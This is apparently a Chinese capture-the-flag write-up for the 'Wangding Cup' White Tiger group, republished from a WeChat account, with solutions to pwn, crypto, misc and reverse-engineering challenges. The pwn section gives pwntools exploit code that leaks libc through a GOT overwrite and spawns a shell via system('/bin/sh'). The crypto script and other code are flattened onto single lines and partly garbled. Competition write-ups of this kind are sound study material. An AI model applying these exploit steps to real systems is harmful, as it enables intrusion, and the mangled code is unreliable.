感谢Yeuoly、丶Sweet、耳东田心走刀口战队成员提供思路,种种原因,这次只我报了名,看成绩最后应该是可以进入线下,诸多原因,放弃了,没有提交WP,今天公众号发布出来,请各位师傅批评指正!
Pwn982
就。。官方给的这个libc也太迷惑了一点,这里崩那里崩,patchelf换掉以后还会崩掉bss的环境,没办法最后直接换的虚拟机的libc
首先很明显的在show的地方存在栈溢出,同时没有限制负数
length_array可控且可以是负数
自定义read中存在大量0字符截断,所以常规方法打不太通
考虑到add处存在溢出
heaparray长度为0x400,即1024,但是length可以为10,即修改 1000 ~ 1100的内容,可以覆盖到count,将其改为负数
题目开了PIE,有canary
考虑首先在show中泄露proc_base
然后泄露libc,溢出到got修改memset的got为puts,因为栈的UAF的问题,会在memset处留下一出libc地址,改为puts进行泄露
sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 8 * 8 + b'xfexffxffxff')sla(b'Please enter the length of your data:', b'101')printf_got = proc_base + elf.got['printf']puts_plt = proc_base + elf.plt['puts']sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(puts_plt))sla(b'Please enter the length of your data:', b'101')sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(puts_plt))sla(b'Please enter the length of your data:', b'101')sl(b'2')
接收libc基址
libc_base = u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00')) - libc.sym['_IO_2_1_stdout_']sla(b'number of your data:', b'-1')
然后再次溢出修改memset的got为system,主要是这里one_gadget用不了
for i in range(9):sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'x10' * 30)sla(b'Please enter the length of your data:', b'101')sl(b'1')sla(b'Please enter your data:', b'a' * 8 * 8 + b'xfexffxffxff')sla(b'Please enter the length of your data:', b'101')system = libc_base + libc.sym['system']sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(system))sla(b'Please enter the length of your data:', b'101')
再次利用栈的UAF,第一次将bin/sh写入栈,但是无法执行,第二次再进入show即可触发system(/bin/sh)
sl(b'1')sla(b'Please enter your data:', b'/bin/shx00')sla(b'Please enter the length of your data:', b'101')sl(b'2')sl(b'1')sl(b'2')#gdb.attach(p, 'b *$rebase(0x14d9)')p.interactive()
Crypto582
脚本:
from Crypto.Util.number import getPrimeimport hashlib,mathe = 2022c1 = 85139434329272123519094184286276070319638471046264384499440682030525456122476228324462769126167628121006213531153927884870307999106015430909361792093581895091445829379547633304737916675926004298753674268141399550405934376072486086468186907326396270307581239055199288888816051281495009808259009684332333344687c2 = 104554808380721645840032269336579549039995977113982697194651690041676187039363703190743891658905715473980017457465221488358016284891528960913854895940235089108270134689312161783470000803482494370322574472422461483052403826282470850666418693908817591349159407595131136843764544166774390400827241213500917391144c3 = 94771625845449128812081345291218973301979152577131568497740476123729158619324753128517222692750900524689049078606978317742545997482763600884362992468406577524708622046033409713416026145377740182233674890063333534646927601262333672233695863286637817471270314093720827409474178917969326556939942622112511819330x = 78237329408351955465927092805995076909826011029371783256454322166600398149132623484679723362562600068961760410039241554232588011577854168402399895992331761353772415982560522912511879304977362225597552446397868843275129027248765252784503841114291392822052506837132093960290237335686354012448414804030938873765y = 100442166633632319633494450595418167608036668647704883492068692098914206322465717138894302011092841820156560129280901426898815274744523998613724326647935591857728931946261379997352809249780159136988674034759483947949779535134522005905257436546335376141008113285692888482442131971935583298243412131571769294029z = 104712661985900115750011628727270934552698948001634201257337487373976943443738367683435788889160488319624447315127992641805597631347763038111352925925686965948545739394656951753648392926627442105629724634607023721715249914976189181389720790879720452348480924301370569461741945968322303130995996793764440204452a = (x-2022)**e-c1b = (y-2022)**e-c2c=math.gcd(a,b)d = (x-e)%ce = (y-e)%c+cflag = c+d+eflag =hashlib.md5(str(flag).encode('utf-8')).hexdigest()print("flag{"+(flag)+"}")
flag{27979a70ef9152b759d9340779256dc8}
Misc620
1. 暴力破解zip文件,8位数字,结果为99114514
2. 解压后得到一个csv文件和一个7z文件。csv文件password字段解密得到7z文件密码为nmy0612
3. 解压7z文件得到flag.txt里韩文:
웬후ퟳ듳삨뫅뗘뛾튻튻뛾뻅뛾죽룜웟냋뗘쇹룜쯄쇣쇹쯄룜뻅웟웟쾸룜뇘웟죽뛾뻅웟뗘쾸쯄쯄뻅튻폒듳삨뫅
4. 使用CyberChef的text encoding brute force暴力解码得到中文flag,转换为英文flag提交即可。
旗帜左大括号地二一一二九二三杠七八地六杠四零六四杠九七七细杠必七三二九七地细四四九一右大括号
flag{d2112923-78d6-4064-977c-b73297dc4491}
Re790
魔改Tea,把delta换了,直接z3就能出来
手动去了花
uint32_t shift(uint32_t val, int n) {return (val << (8 - n) | (val >> n));}unsigned char encrypted[] = {0xf2, 0x7f, 0x09, 0x05, 0xd7, 0x77, 0x16, 0x91, 0x25, 0x01, 0x2e,0xc5, 0x97, 0x26, 0x63, 0x82, 0x01, 0x40, 0x15, 0x2d, 0xfc, 0x53,0xdb, 0xd3, 0xc4, 0xdb, 0x0a, 0x1f, 0x82, 0x1e, 0x99, 0x4e, 0xfe,0x0c, 0x80, 0xb8, 0xa5, 0x61, 0x0e, 0x99, 0xdf, 0x39};void re(unsigned char *encrypted) {unsigned int v1, v2, sum;int times = 32;for (int i = 0; i < 5; i++) {v1 = *(uint32_t *)(encrypted + 8 * i);v2 = *(uint32_t *)(encrypted + 8 * i + 4);sum = 0x6526b0d9;times = 32;do {sum += 0x61c88647;v2 -= ((v1 << 4) + 0x43) ^ (sum + v1) ^ ((v1 >> 5) + 0x56);v1 -= ((v2 << 4) + 0xc) ^ (sum + v2) ^ ((v2 >> 5) + 0x2d);--times;} while(times);*(uint32_t *)(encrypted + 8 * i) = v1;*(uint32_t *)(encrypted + 8 * i + 4) = v2;}}int main() {for(int i = 0; i < 42; i++) {encrypted[i] = shift(encrypted[i], 5);}for(int i = 0; i < 42; i++) {encrypted[i] ^= 0x66;encrypted[i] -= 0x32;}re(encrypted);printf("%s", encrypted);}
原文始发于微信公众号(衡阳信安):“网鼎杯”白虎组-船山院士wp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论